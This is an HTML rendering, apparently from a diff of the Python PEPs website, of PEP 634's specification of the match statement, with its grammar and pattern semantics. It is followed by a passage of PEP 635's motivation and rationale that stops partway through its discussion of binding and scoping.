This PEP is a historical document. The up-to-date, canonical documentation can now be found at The match statement.

+


+

See PEP 1 for how to propose changes.

+
+
+

Abstract

+

This PEP provides the technical specification for the match +statement. It replaces PEP 622, which is hereby split in three parts:

+    
  • PEP 634: Specification
  • +
  • PEP 635: Motivation and Rationale
  • +
  • PEP 636: Tutorial
  • +
+

This PEP is intentionally devoid of commentary; the motivation and all +explanations of our design choices are in PEP 635. First-time readers +are encouraged to start with PEP 636, which provides a gentler +introduction to the concepts, syntax and semantics of patterns.

+
+
+

Syntax and Semantics

+

See Appendix A for the complete grammar.

+
+

Overview and Terminology

+

The pattern matching process takes as input a pattern (following +case) and a subject value (following match). Phrases to +describe the process include “the pattern is matched with (or against) +the subject value” and “we match the pattern against (or with) the +subject value”.

+

The primary outcome of pattern matching is success or failure. In +case of success we may say “the pattern succeeds”, “the match +succeeds”, or “the pattern matches the subject value”.

+

In many cases a pattern contains subpatterns, and success or failure +is determined by the success or failure of matching those subpatterns +against the value (e.g., for OR patterns) or against parts of the +value (e.g., for sequence patterns). This process typically processes +the subpatterns from left to right until the overall outcome is +determined. E.g., an OR pattern succeeds at the first succeeding +subpattern, while a sequence pattern fails at the first failing +subpattern.

+

A secondary outcome of pattern matching may be one or more name +bindings. We may say “the pattern binds a value to a name”. When +subpatterns are tried until the first success, only the bindings due to +the successful subpattern are valid; when trying until the first +failure, the bindings are merged. Several more rules, explained +below, apply to these cases.

+
+
+

The Match Statement

+

Syntax:

+
match_stmt: "match" subject_expr ':' NEWLINE INDENT case_block+ DEDENT
+subject_expr:
+    | star_named_expression ',' star_named_expressions?
+    | named_expression
+case_block: "case" patterns [guard] ':' block
+guard: 'if' named_expression
+
+
+

The rules star_named_expression, star_named_expressions, +named_expression and block are part of the standard Python +grammar.

+

The rule patterns is specified below.

+

For context, match_stmt is a new alternative for +compound_statement:

+
compound_statement:
+    | if_stmt
+    ...
+    | match_stmt
+
+
+

The match and case keywords are soft keywords, i.e. they are +not reserved words in other grammatical contexts (including at the +start of a line if there is no colon where expected). This implies +that they are recognized as keywords when part of a match +statement or case block only, and are allowed to be used in all +other contexts as variable or argument names.

+
+

Match Semantics

+

The match statement first evaluates the subject expression. If a +comma is present a tuple is constructed using the standard rules.

+

The resulting subject value is then used to select the first case +block whose patterns succeed in matching it and whose guard condition +(if present) is “truthy”. If no case blocks qualify, the match +statement is complete; otherwise, the block of the selected case block +is executed. The usual rules for executing a block nested inside a +compound statement apply (e.g. an if statement).

+

Name bindings made during a successful pattern match outlive the +executed block and can be used after the match statement.

+
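For example, with a hypothetical subject, the second case block below is selected, and its bindings outlive the statement:

+
command = 'go north'
+match command.split():
+    case [action]:
+        print(action)
+    case [action, direction]:
+        print(action, direction)  # selected: prints 'go north'
+
+print(direction)  # the binding survives the match statement: prints 'north'
+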

During failed pattern matches, some subpatterns may succeed. For +example, while matching the pattern (0, x, 1) with the value [0, +1, 2], the subpattern x may succeed if the list elements are +matched from left to right. The implementation may choose to either +make persistent bindings for those partial matches or not. User code +including a match statement should not rely on the bindings being +made for a failed match, but also shouldn’t assume that variables are +unchanged by a failed match. This part of the behavior is left +intentionally unspecified so different implementations can add +optimizations, and to prevent introducing semantic restrictions that +could limit the extensibility of this feature.

+

The precise pattern binding rules vary per pattern type and are +specified below.

+
+
+

Guards

+

If a guard is present on a case block, once the pattern or patterns in +the case block succeed, the expression in the guard is evaluated. If +this raises an exception, the exception bubbles up. Otherwise, if the +condition is “truthy” the case block is selected; if it is “falsy” the +case block is not selected.

+

Since guards are expressions they are allowed to have side effects. +Guard evaluation must proceed from the first to the last case block, +one at a time, skipping case blocks whose pattern(s) don’t all +succeed. (I.e., even if determining whether those patterns succeed +may happen out of order, guard evaluation must happen in order.) +Guard evaluation must stop once a case block is selected.

+
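For example (the subject is hypothetical), both case blocks bind x and y, and the guard then decides which one is selected:

+
point = (3, 4)
+match point:
+    case (x, y) if x == y:
+        print('on the diagonal')
+    case (x, y):
+        print(f'off the diagonal: {x}, {y}')  # selected for (3, 4)
+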
+
+

Irrefutable case blocks

+

A pattern is considered irrefutable if we can prove from its syntax +alone that it will always succeed. In particular, capture patterns +and wildcard patterns are irrefutable, and so are AS patterns whose +left-hand side is irrefutable, OR patterns containing at least +one irrefutable pattern, and parenthesized irrefutable patterns.

+

A case block is considered irrefutable if it has no guard and its +pattern is irrefutable.

+

A match statement may have at most one irrefutable case block, and it +must be last.

+
+
+
+

Patterns

+

The top-level syntax for patterns is as follows:

+
patterns: open_sequence_pattern | pattern
+pattern: as_pattern | or_pattern
+as_pattern: or_pattern 'as' capture_pattern
+or_pattern: '|'.closed_pattern+
+closed_pattern:
+    | literal_pattern
+    | capture_pattern
+    | wildcard_pattern
+    | value_pattern
+    | group_pattern
+    | sequence_pattern
+    | mapping_pattern
+    | class_pattern
+
+
+
+

AS Patterns

+

Syntax:

+
as_pattern: or_pattern 'as' capture_pattern
+
+
+

(Note: the name on the right may not be _.)

+

An AS pattern matches the OR pattern on the left of the as +keyword against the subject. If this fails, the AS pattern fails. +Otherwise, the AS pattern binds the subject to the name on the right +of the as keyword and succeeds.

+
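For example (hypothetical values), the OR pattern on the left is matched first, then the whole subject is bound:

+
match 404:
+    case 401 | 403 | 404 as status:
+        print(status)  # prints 404
+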
+
+

OR Patterns

+

Syntax:

+
or_pattern: '|'.closed_pattern+
+
+
+

When two or more patterns are separated by vertical bars (|), +this is called an OR pattern. (A single closed pattern is just that.)

+

Only the final subpattern may be irrefutable.

+

Each subpattern must bind the same set of names.

+

An OR pattern matches each of its subpatterns in turn to the subject, +until one succeeds. The OR pattern is then deemed to succeed. +If none of the subpatterns succeed the OR pattern fails.

+
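For example (hypothetical values; note that each alternative binds the same, here empty, set of names):

+
for code in (401, 404, 200):
+    match code:
+        case 401 | 403 | 404:
+            print(code, 'matched by the OR pattern')
+        case _:
+            print(code, 'fell through to the wildcard')
+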
+
+

Literal Patterns

+

Syntax:

+
literal_pattern:
+    | signed_number
+    | signed_number '+' NUMBER
+    | signed_number '-' NUMBER
+    | strings
+    | 'None'
+    | 'True'
+    | 'False'
+signed_number: NUMBER | '-' NUMBER
+
+
+

The rule strings and the token NUMBER are defined in the +standard Python grammar.

+

Triple-quoted strings are supported. Raw strings and byte strings +are supported. F-strings are not supported.

+

The forms signed_number '+' NUMBER and signed_number '-' +NUMBER are only permitted to express complex numbers; they require a +real number on the left and an imaginary number on the right.

+

A literal pattern succeeds if the subject value compares equal to the +value expressed by the literal, using the following comparisons rules:

+
    +
  • Numbers and strings are compared using the == operator.
  • +
  • The singleton literals None, True and False are compared +using the is operator.
  • +
+
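A hypothetical demonstration of these comparison rules, including the complex-number form:

+
for value in (1 + 2j, None, 'spam'):
+    match value:
+        case 1 + 2j:   # signed_number '+' NUMBER: a complex literal
+            print('complex literal, compared with ==')
+        case None:     # singleton, compared with is
+            print('None')
+        case 'spam':   # string, compared with ==
+            print('spam')
+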
+
+

Capture Patterns

+

Syntax:

+
capture_pattern: !"_" NAME
+
+
+

The single underscore (_) is not a capture pattern (this is what +!"_" expresses). It is treated as a wildcard pattern.

+

A capture pattern always succeeds. It binds the subject value to the +name using the scoping rules for name binding established for the +walrus operator in PEP 572. (Summary: the name becomes a local +variable in the closest containing function scope unless there’s an +applicable nonlocal or global statement.)

+

In a given pattern, a given name may be bound only once. This +disallows for example case x, x: ... but allows case [x] | x: +....

+
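A minimal illustration of the permitted form (the subject is hypothetical):

+
match [42]:
+    case [x] | x:  # each alternative binds x, and each binds it only once
+        print(x)   # prints 42
+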
+
+

Wildcard Pattern

+

Syntax:

+
wildcard_pattern: "_"
+
+
+

A wildcard pattern always succeeds. It binds no name.

+
+
+

Value Patterns

+

Syntax:

+
value_pattern: attr
+attr: name_or_attr '.' NAME
+name_or_attr: attr | NAME
+
+
+

The dotted name in the pattern is looked up using the standard Python +name resolution rules. However, when the same value pattern occurs +multiple times in the same match statement, the interpreter may cache +the first value found and reuse it, rather than repeat the same +lookup. (To clarify, this cache is strictly tied to a given execution +of a given match statement.)

+

The pattern succeeds if the value found thus compares equal to the +subject value (using the == operator).

+
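A hypothetical example using an enum, a typical use of value patterns:

+
from enum import Enum
+
+class Color(Enum):
+    RED = 1
+    GREEN = 2
+
+match Color.RED:
+    case Color.GREEN:  # dotted name looked up, compared with ==
+        print('green')
+    case Color.RED:
+        print('red')   # selected
+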
+
+

Group Patterns

+

Syntax:

+
group_pattern: '(' pattern ')'
+
+
+

(For the syntax of pattern, see Patterns above. Note that it +contains no comma – a parenthesized series of items with at least one +comma is a sequence pattern, as is ().)

+

A parenthesized pattern has no additional syntax. It allows users to +add parentheses around patterns to emphasize the intended grouping.

+
+
+

Sequence Patterns

+

Syntax:

+
sequence_pattern:
+  | '[' [maybe_sequence_pattern] ']'
+  | '(' [open_sequence_pattern] ')'
+open_sequence_pattern: maybe_star_pattern ',' [maybe_sequence_pattern]
+maybe_sequence_pattern: ','.maybe_star_pattern+ ','?
+maybe_star_pattern: star_pattern | pattern
+star_pattern: '*' (capture_pattern | wildcard_pattern)
+
+
+

(Note that a single parenthesized pattern without a trailing comma is +a group pattern, not a sequence pattern. However a single pattern +enclosed in [...] is still a sequence pattern.)

+

There is no semantic difference between a sequence pattern using +[...], a sequence pattern using (...), and an open sequence +pattern.

+

A sequence pattern may contain at most one star subpattern. The star +subpattern may occur in any position. If no star subpattern is +present, the sequence pattern is a fixed-length sequence pattern; +otherwise it is a variable-length sequence pattern.

+

For a sequence pattern to succeed the subject must be a sequence, +where being a sequence is defined as its class being one of the following:

+
    +
  • a class that inherits from collections.abc.Sequence
  • +
  • a Python class that has been registered as a collections.abc.Sequence
  • +
  • a builtin class that has its Py_TPFLAGS_SEQUENCE bit set
  • +
  • a class that inherits from any of the above (including classes defined before a +parent’s Sequence registration)
  • +
+

The following standard library classes will have their Py_TPFLAGS_SEQUENCE +bit set:

+
    +
  • array.array
  • +
  • collections.deque
  • +
  • list
  • +
  • memoryview
  • +
  • range
  • +
  • tuple
  • +
+
+

Note

+

Although str, bytes, and bytearray are usually +considered sequences, they are not included in the above list and do +not match sequence patterns.

+
+

A fixed-length sequence pattern fails if the length of the subject +sequence is not equal to the number of subpatterns.

+

A variable-length sequence pattern fails if the length of the subject +sequence is less than the number of non-star subpatterns.

+

The length of the subject sequence is obtained using the builtin +len() function (i.e., via the __len__ protocol). However, the +interpreter may cache this value in a similar manner as described for +value patterns.

+

A fixed-length sequence pattern matches the subpatterns to +corresponding items of the subject sequence, from left to right. +Matching stops (with a failure) as soon as a subpattern fails. If all +subpatterns succeed in matching their corresponding item, the sequence +pattern succeeds.

+

A variable-length sequence pattern first matches the leading non-star +subpatterns to the corresponding items of the subject sequence, as for +a fixed-length sequence. If this succeeds, the star subpattern +matches a list formed of the remaining subject items, with items +removed from the end corresponding to the non-star subpatterns +following the star subpattern. The remaining non-star subpatterns are +then matched to the corresponding subject items, as for a fixed-length +sequence.

+
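For example (the subject is hypothetical), the star subpattern collects the middle items into a list:

+
match [0, 1, 2, 3, 4]:
+    case [first, *middle, last]:
+        print(first, middle, last)  # prints: 0 [1, 2, 3] 4
+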
+
+

Mapping Patterns

+

Syntax:

+
mapping_pattern: '{' [items_pattern] '}'
+items_pattern: ','.key_value_pattern+ ','?
+key_value_pattern:
+    | (literal_pattern | value_pattern) ':' pattern
+    | double_star_pattern
+double_star_pattern: '**' capture_pattern
+
+
+

(Note that **_ is disallowed by this syntax.)

+

A mapping pattern may contain at most one double star pattern, +and it must be last.

+

A mapping pattern may not contain duplicate key values. +(If all key patterns are literal patterns this is considered a +syntax error; otherwise this is a runtime error and will +raise ValueError.)

+

For a mapping pattern to succeed the subject must be a mapping, +where being a mapping is defined as its class being one of the following:

+
    +
  • a class that inherits from collections.abc.Mapping
  • +
  • a Python class that has been registered as a collections.abc.Mapping
  • +
  • a builtin class that has its Py_TPFLAGS_MAPPING bit set
  • +
  • a class that inherits from any of the above (including classes defined before a +parent’s Mapping registration)
  • +
+

The standard library classes dict and mappingproxy will have their Py_TPFLAGS_MAPPING +bit set.

+

A mapping pattern succeeds if every key given in the mapping pattern +is present in the subject mapping, and the pattern for +each key matches the corresponding item of the subject mapping. Keys +are always compared with the == operator. If a '**' +NAME form is present, that name is bound to a dict containing +remaining key-value pairs from the subject mapping.

+

If duplicate keys are detected in the mapping pattern, the pattern is +considered invalid, and a ValueError is raised.

+

Key-value pairs are matched using the two-argument form of the +subject’s get() method. As a consequence, matched key-value pairs +must already be present in the mapping, and not created on-the-fly by +__missing__ or __getitem__. For example, +collections.defaultdict instances will only be matched by patterns +with keys that were already present when the match statement was +entered.

+
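For example (the subject is hypothetical), keys not mentioned in the pattern are ignored unless captured by a double star pattern:

+
match {'action': 'move', 'x': 1, 'y': 2}:
+    case {'action': act, **rest}:
+        print(act, rest)  # prints: move {'x': 1, 'y': 2}
+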
+
+

Class Patterns

+

Syntax:

+
class_pattern:
+    | name_or_attr '(' [pattern_arguments ','?] ')'
+pattern_arguments:
+    | positional_patterns [',' keyword_patterns]
+    | keyword_patterns
+positional_patterns: ','.pattern+
+keyword_patterns: ','.keyword_pattern+
+keyword_pattern: NAME '=' pattern
+
+
+

A class pattern may not repeat the same keyword multiple times.

+

If name_or_attr is not an instance of the builtin type, +TypeError is raised.

+

A class pattern fails if the subject is not an instance of name_or_attr. +This is tested using isinstance().

+

If no arguments are present, the pattern succeeds if the isinstance() +check succeeds. Otherwise:

+
    +
  • If only keyword patterns are present, they are processed as follows, +one by one:
      +
    • The keyword is looked up as an attribute on the subject.
        +
      • If this raises an exception other than AttributeError, +the exception bubbles up.
      • +
      • If this raises AttributeError the class pattern fails.
      • +
      • Otherwise, the subpattern associated with the keyword is matched +against the attribute value. If this fails, the class pattern fails. +If it succeeds, the match proceeds to the next keyword.
      • +
      +
    • +
    • If all keyword patterns succeed, the class pattern as a whole succeeds.
    • +
    +
  • +
  • If any positional patterns are present, they are converted to keyword +patterns (see below) and treated as additional keyword patterns, +preceding the syntactic keyword patterns (if any).
  • +
+

Positional patterns are converted to keyword patterns using the +__match_args__ attribute on the class designated by name_or_attr, +as follows:

+
    +
  • For a number of built-in types (specified below), +a single positional subpattern is accepted which will match +the entire subject. (Keyword patterns work as for other types here.)
  • +
  • The equivalent of getattr(cls, "__match_args__", ()) is called.
  • +
  • If this raises an exception the exception bubbles up.
  • +
  • If the returned value is not a tuple, the conversion fails +and TypeError is raised.
  • +
  • If there are more positional patterns than the length of +__match_args__ (as obtained using len()), TypeError is raised.
  • +
  • Otherwise, positional pattern i is converted to a keyword pattern using __match_args__[i] as the keyword, provided the latter is a string; if it is not, TypeError is raised.
  • +
  • For duplicate keywords, TypeError is raised.
  • +
+

Once the positional patterns have been converted to keyword patterns, +the match proceeds as if there were only keyword patterns.

+

As mentioned above, for the following built-in types the handling of +positional subpatterns is different: +bool, bytearray, bytes, dict, float, +frozenset, int, list, set, str, and tuple.

+

This behavior is roughly equivalent to the following:

+
class C:
+    __match_args__ = ("__match_self_prop__",)
+    @property
+    def __match_self_prop__(self):
+        return self
+
+
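
In effect, for these built-in types a single positional pattern captures the subject itself once the isinstance() check succeeds; a brief sketch:

match "hello":
+    case str(s):      # the single positional subpattern matches the entire subject
+        print(s)      # hello
+
+match 42:
+    case float(x):    # fails: isinstance(42, float) is False
+        print("float", x)
+    case int(x):
+        print("int", x)   # int 42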
+
+
+
+
+

Side Effects and Undefined Behavior

+

The only side-effect produced explicitly by the matching process is +the binding of names. However, the process relies on attribute +access, instance checks, len(), equality and item access on the +subject and some of its components. It also evaluates value +patterns and the class name of class patterns. While none of those +typically create any side-effects, in theory they could. This +proposal intentionally leaves out any specification of what methods +are called or how many times. This behavior is therefore undefined +and user code should not rely on it.

+

Another undefined behavior is the binding of variables by capture patterns that are followed (in the same case block) by another pattern that fails. Such bindings may happen earlier or later depending on the implementation strategy, the only constraint being that capture variables must be set before guards that use them explicitly are evaluated. If a guard consists of an and clause, evaluation of the operands may even be interspersed with pattern matching, as long as left-to-right evaluation order is maintained.

+
+
+

The Standard Library

+

To facilitate the use of pattern matching, several changes will be +made to the standard library:

+
    +
  • Namedtuples and dataclasses will have auto-generated +__match_args__.
  • +
  • For dataclasses the order of attributes in the generated __match_args__ will be the same as the order of corresponding arguments in the generated __init__() method. This includes situations where attributes are inherited from a superclass. Fields with init=False are excluded from __match_args__. (A sketch follows this list.)
  • +
+
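
A short sketch of the generated __match_args__ for a hypothetical dataclass:

from dataclasses import dataclass, field
+
+@dataclass
+class Point3D:
+    x: int
+    y: int
+    z: int = field(default=0, init=False)   # init=False: left out of __match_args__
+
+print(Point3D.__match_args__)    # ('x', 'y')
+
+match Point3D(1, 2):
+    case Point3D(a, b):          # positional patterns rely on the generated __match_args__
+        print(a, b)              # 1 2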

In addition, a systematic effort will be put into going through +existing standard library classes and adding __match_args__ where +it looks beneficial.

+
+
+

Appendix A – Full Grammar

+

Here is the full grammar for match_stmt. This is an additional +alternative for compound_stmt. Remember that match and +case are soft keywords, i.e. they are not reserved words in other +grammatical contexts (including at the start of a line if there is no +colon where expected). By convention, hard keywords use single quotes +while soft keywords use double quotes.

+

Other notation used beyond standard EBNF:

+
    +
  • SEP.RULE+ is shorthand for RULE (SEP RULE)*
  • +
  • !RULE is a negative lookahead assertion
  • +
+
match_stmt: "match" subject_expr ':' NEWLINE INDENT case_block+ DEDENT
+subject_expr:
+    | star_named_expression ',' [star_named_expressions]
+    | named_expression
+case_block: "case" patterns [guard] ':' block
+guard: 'if' named_expression
+
+patterns: open_sequence_pattern | pattern
+pattern: as_pattern | or_pattern
+as_pattern: or_pattern 'as' capture_pattern
+or_pattern: '|'.closed_pattern+
+closed_pattern:
+    | literal_pattern
+    | capture_pattern
+    | wildcard_pattern
+    | value_pattern
+    | group_pattern
+    | sequence_pattern
+    | mapping_pattern
+    | class_pattern
+
+literal_pattern:
+    | signed_number !('+' | '-')
+    | signed_number '+' NUMBER
+    | signed_number '-' NUMBER
+    | strings
+    | 'None'
+    | 'True'
+    | 'False'
+signed_number: NUMBER | '-' NUMBER
+
+capture_pattern: !"_" NAME !('.' | '(' | '=')
+
+wildcard_pattern: "_"
+
+value_pattern: attr !('.' | '(' | '=')
+attr: name_or_attr '.' NAME
+name_or_attr: attr | NAME
+
+group_pattern: '(' pattern ')'
+
+sequence_pattern:
+  | '[' [maybe_sequence_pattern] ']'
+  | '(' [open_sequence_pattern] ')'
+open_sequence_pattern: maybe_star_pattern ',' [maybe_sequence_pattern]
+maybe_sequence_pattern: ','.maybe_star_pattern+ ','?
+maybe_star_pattern: star_pattern | pattern
+star_pattern: '*' (capture_pattern | wildcard_pattern)
+
+mapping_pattern: '{' [items_pattern] '}'
+items_pattern: ','.key_value_pattern+ ','?
+key_value_pattern:
+    | (literal_pattern | value_pattern) ':' pattern
+    | double_star_pattern
+double_star_pattern: '**' capture_pattern
+
+class_pattern:
+    | name_or_attr '(' [pattern_arguments ','?] ')'
+pattern_arguments:
+    | positional_patterns [',' keyword_patterns]
+    | keyword_patterns
+positional_patterns: ','.pattern+
+keyword_patterns: ','.keyword_pattern+
+keyword_pattern: NAME '=' pattern
+
+
+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0634.rst

+

Last modified: 2023-12-11 05:40:56 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0635/index.html b/pep-0635/index.html new file mode 100644 index 00000000000..d663cedc147 --- /dev/null +++ b/pep-0635/index.html @@ -0,0 +1,1306 @@ + PEP 635 – Structural Pattern Matching: Motivation and Rationale | peps.python.org
+
+


+ + +
+
+
+

PEP 635 – Structural Pattern Matching: Motivation and Rationale

+
+
Author:
+
Tobias Kohn <kohnt at tobiaskohn.ch>, +Guido van Rossum <guido at python.org>
+
BDFL-Delegate:
+

+
Discussions-To:
+
Python-Dev list
+
Status:
+
Final
+
Type:
+
Informational
+
Created:
+
12-Sep-2020
+
Python-Version:
+
3.10
+
Post-History:
+
22-Oct-2020, 08-Feb-2021
+
Resolution:
+
Python-Committers message
+
+
+
+
+
+

Abstract

+

This PEP provides the motivation and rationale for PEP 634 +(“Structural Pattern Matching: Specification”). First-time readers +are encouraged to start with PEP 636, which provides a gentler +introduction to the concepts, syntax and semantics of patterns.

+
+
+

Motivation

+

(Structural) pattern matching syntax is found in many languages, from +Haskell, Erlang and Scala to Elixir and Ruby. (A proposal for +JavaScript is also under consideration.)

+

Python already supports a limited form of this through sequence +unpacking assignments, which the new proposal leverages.

+

Several other common Python idioms are also relevant:

+
    +
  • The if ... elif ... elif ... else idiom is often used to find +out the type or shape of an object in an ad-hoc fashion, using one +or more checks like isinstance(x, cls), hasattr(x, "attr"), +len(x) == n or "key" in x as guards to select an applicable +block. The block can then assume x supports the interface +checked by the guard. For example:
    if isinstance(x, tuple) and len(x) == 2:
    +    host, port = x
    +    mode = "http"
    +elif isinstance(x, tuple) and len(x) == 3:
    +    host, port, mode = x
    +# Etc.
    +
    +
    +

    Code like this is more elegantly rendered using match:

    +
    match x:
    +    case host, port:
    +        mode = "http"
    +    case host, port, mode:
    +        pass
    +    # Etc.
    +
    +
    +
  • +
  • AST traversal code often looks for nodes matching a given pattern, +for example the code to detect a node of the shape “A + B * C” might +look like this:
    if (isinstance(node, BinOp) and node.op == "+"
    +        and isinstance(node.right, BinOp) and node.right.op == "*"):
    +    a, b, c = node.left, node.right.left, node.right.right
    +    # Handle a + b*c
    +
    +
    +

    Using match this becomes more readable:

    +
    match node:
    +    case BinOp("+", a, BinOp("*", b, c)):
    +        # Handle a + b*c
    +
    +
    +
  • +
+

We believe that adding pattern matching to Python will enable Python +users to write cleaner, more readable code for examples like those +above, and many others.

+

For a more academic discussion of this proposal, see [1].

+
+

Pattern Matching and OO

+

Pattern matching is complementary to the object-oriented paradigm. Using OO and inheritance we can easily define a method on a base class that defines default behavior for a specific operation on that class, and we can override this default behavior in subclasses. We can also use the Visitor pattern to separate actions from data.

+

But this is not sufficient for all situations. For example, a code +generator may consume an AST, and have many operations where the +generated code needs to vary based not just on the class of a node, +but also on the value of some class attributes, like the BinOp +example above. The Visitor pattern is insufficiently flexible for +this: it can only select based on the class.

+

See a complete example.

+

Like the Visitor pattern, pattern matching allows for a strict separation +of concerns: specific actions or data processing is independent of the +class hierarchy or manipulated objects. When dealing with predefined or +even built-in classes, in particular, it is often impossible to add further +methods to the individual classes. Pattern matching not only relieves the +programmer or class designer from the burden of the boilerplate code needed +for the Visitor pattern, but is also flexible enough to directly work with +built-in types. It naturally distinguishes between sequences of different +lengths, which might all share the same class despite obviously differing +structures. Moreover, pattern matching automatically takes inheritance +into account: a class D inheriting from C will be handled by a pattern +that targets C by default.

+

Object oriented programming is geared towards single dispatch: it is a single instance (or the type thereof) that determines which method is to be called. This leads to a somewhat artificial situation in the case of binary operators, where both objects might play an equal role in deciding which implementation to use (Python addresses this through the use of reversed binary methods). Pattern matching is structurally better suited to handle such situations of multi-dispatch, where the action to be taken depends in equal parts on the types of several objects.

+
+
+

Patterns and Functional Style

+

Many Python applications and libraries are not written in a consistent +OO style – unlike Java, Python encourages defining functions at the +top-level of a module, and for simple data structures, tuples (or +named tuples or lists) and dictionaries are often used exclusively or +mixed with classes or data classes.

+

Pattern matching is particularly suitable for picking apart such data structures. As an extreme example, it’s easy to write code that picks apart a JSON data structure using match:

+
match json_pet:
+    case {"type": "cat", "name": name, "pattern": pattern}:
+        return Cat(name, pattern)
+    case {"type": "dog", "name": name, "breed": breed}:
+        return Dog(name, breed)
+    case _:
+        raise ValueError("Not a suitable pet")
+
+
+

Functional programming generally prefers a declarative style with a focus +on relationships in data. Side effects are avoided whenever possible. +Pattern matching thus naturally fits and highly supports functional +programming style.

+
+
+
+

Rationale

+

This section provides the rationale for individual design decisions. +It takes the place of “Rejected ideas” in the standard PEP format. +It is organized in sections corresponding to the specification (PEP 634).

+
+

Overview and Terminology

+

Much of the power of pattern matching comes from the nesting of subpatterns. That the success of a pattern match depends directly on the success of its subpatterns is thus a cornerstone of the design. However, although a pattern like P(Q(), R()) succeeds only if both subpatterns Q() and R() succeed (i.e. the success of pattern P depends on Q and R), the pattern P is checked first. If P fails, neither Q() nor R() will be tried (this is a direct consequence of the fact that if P fails, there are no subjects to match against Q() and R() in the first place).

+

Also note that patterns bind names to values rather than performing an +assignment. This reflects the fact that patterns aim to not have side +effects, which also means that Capture or AS patterns cannot assign a +value to an attribute or subscript. We thus consistently use the term +‘bind’ instead of ‘assign’ to emphasise this subtle difference between +traditional assignments and name binding in patterns.

+
+
+

The Match Statement

+

The match statement evaluates an expression to produce a subject, finds the +first pattern that matches the subject, and executes the associated block +of code. Syntactically, the match statement thus takes an expression and +a sequence of case clauses, where each case clause comprises a pattern and +a block of code.

+

Since case clauses comprise a block of code, they adhere to the existing +indentation scheme with the syntactic structure of +<keyword> ...: <(indented) block>, which resembles a compound +statement. The keyword case reflects its widespread use in +pattern matching languages, ignoring those languages that use other +syntactic means such as a symbol like |, because it would not fit +established Python structures. The syntax of patterns following the +keyword is discussed below.

+

Given that the case clauses follow the structure of a compound statement, the match statement itself naturally becomes a compound statement as well, following the same syntactic structure. This naturally leads to match <expr>: <case_clause>+. Note that the match statement determines a quasi-scope in which the evaluated subject is kept alive (although not in a local variable), similar to how a with statement might keep a resource alive during execution of its block. Furthermore, control flows from the match statement to a case clause and then leaves the block of the match statement. The block of the match statement thus has both syntactic and semantic meaning.

+

Various suggestions have sought to eliminate or avoid the naturally arising +“double indentation” of a case clause’s code block. Unfortunately, all such +proposals of flat indentation schemes come at the expense of violating +Python’s established structural paradigm, leading to additional syntactic +rules:

+
    +
  • Unindented case clauses. +The idea is to align case clauses with the match, i.e.:
    match expression:
    +case pattern_1:
    +    ...
    +case pattern_2:
    +    ...
    +
    +
    +

    This may look awkward to the eye of a Python programmer, because everywhere else a colon is followed by an indent. The match would follow the syntactic scheme of neither simple nor compound statements, but rather establish a category of its own.

    +
  • +
  • Putting the expression on a separate line after “match”. +The idea is to use the expression yielding the subject as a statement +to avoid the singularity of match having no actual block despite +the colons:
    match:
    +    expression
    +case pattern_1:
    +    ...
    +case pattern_2:
    +    ...
    +
    +
    +

    This was ultimately rejected because the first block would be another +novelty in Python’s grammar: a block whose only content is a single +expression rather than a sequence of statements. Attempts to amend this +issue by adding or repurposing yet another keyword along the lines of +match: return expression did not yield any satisfactory solution.

    +
  • +
+

Although flat indentation would save some horizontal space, the cost of +increased complexity or unusual rules is too high. It would also complicate +life for simple-minded code editors. Finally, the horizontal space issue can +be alleviated by allowing “half-indent” (i.e. two spaces instead of four) +for match statements (though we do not recommend this).

+

In sample programs using match, written as part of the development of this +PEP, a noticeable improvement in code brevity is observed, more than making +up for the additional indentation level.

+

Statement vs. Expression. Some suggestions centered around the idea of +making match an expression rather than a statement. However, this +would fit poorly with Python’s statement-oriented nature and lead to +unusually long and complex expressions and the need to invent new +syntactic constructs or break well established syntactic rules. An +obvious consequence of match as an expression would be that case +clauses could no longer have arbitrary blocks of code attached, but only +a single expression. Overall, the strong limitations could in no way +offset the slight simplification in some special use cases.

+

Hard vs. Soft Keyword. There were options to make match a hard keyword, or to choose a different keyword. Although using a hard keyword would simplify life for simple-minded syntax highlighters, we decided not to use a hard keyword for several reasons:

+
    +
  • Most importantly, the new parser doesn’t require us to do this. Unlike async, which caused hardships by being a soft keyword for a few releases, here we can make match a permanent soft keyword.
  • +
  • match is so commonly used in existing code that a hard keyword would break almost every existing program and would put the burden of fixing code on many people who may not even benefit from the new syntax.
  • +
  • It is hard to find an alternative keyword that would not be commonly used +in existing programs as an identifier, and would still clearly reflect the +meaning of the statement.
  • +
+

Use “as” or “|” instead of “case” for case clauses. +The pattern matching proposed here is a combination of multi-branch control +flow (in line with switch in Algol-derived languages or cond in Lisp) +and object-deconstruction as found in functional languages. While the proposed +keyword case highlights the multi-branch aspect, alternative keywords such +as as would equally be possible, highlighting the deconstruction aspect. +as or with, for instance, also have the advantage of already being +keywords in Python. However, since case as a keyword can only occur as a +leading keyword inside a match statement, it is easy for a parser to +distinguish between its use as a keyword or as a variable.

+

Other variants would use a symbol like | or =>, or go entirely without +special marker.

+

Since Python is a statement-oriented language in the tradition of Algol, and as +each composite statement starts with an identifying keyword, case seemed to +be most in line with Python’s style and traditions.

+
+

Match Semantics

+

The patterns of different case clauses might overlap in that more than +one case clause would match a given subject. The first-to-match rule +ensures that the selection of a case clause for a given subject is +unambiguous. Furthermore, case clauses can have increasingly general +patterns matching wider sets of subjects. The first-to-match rule +then ensures that the most precise pattern can be chosen (although it +is the programmer’s responsibility to order the case clauses correctly).

+

In a statically typed language, the match statement would be compiled to +a decision tree to select a matching pattern quickly and very efficiently. +This would, however, require that all patterns be purely declarative and +static, running against the established dynamic semantics of Python. The +proposed semantics thus represent a path incorporating the best of both +worlds: patterns are tried in a strictly sequential order so that each +case clause constitutes an actual statement. At the same time, we allow +the interpreter to cache any information about the subject or change the +order in which subpatterns are tried. In other words: if the interpreter +has found that the subject is not an instance of a class C, it can +directly skip case clauses testing for this again, without having to +perform repeated instance-checks. If a guard stipulates that a variable +x must be positive, say (i.e. if x > 0), the interpreter might +check this directly after binding x and before any further +subpatterns are considered.

+

Binding and scoping. In many pattern matching implementations, each case clause would establish a separate scope of its own. Variables bound by a pattern would then only be visible inside the corresponding case block. In Python, however, this does not make sense. Establishing separate scopes would essentially mean that each case clause is a separate function without direct access to the variables in the surrounding scope (without having to resort to nonlocal, that is). Moreover, a case clause could no longer influence any surrounding control flow through standard statements such as return or break. Hence, such strict scoping would lead to unintuitive and surprising behavior.

+

A direct consequence of this is that any variable bindings outlive the +respective case or match statements. Even patterns that only match a +subject partially might bind local variables (this is, in fact, necessary +for guards to function properly). However, these semantics for variable +binding are in line with existing Python structures such as for loops and +with statements.
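
A brief sketch of bindings outliving the match statement:
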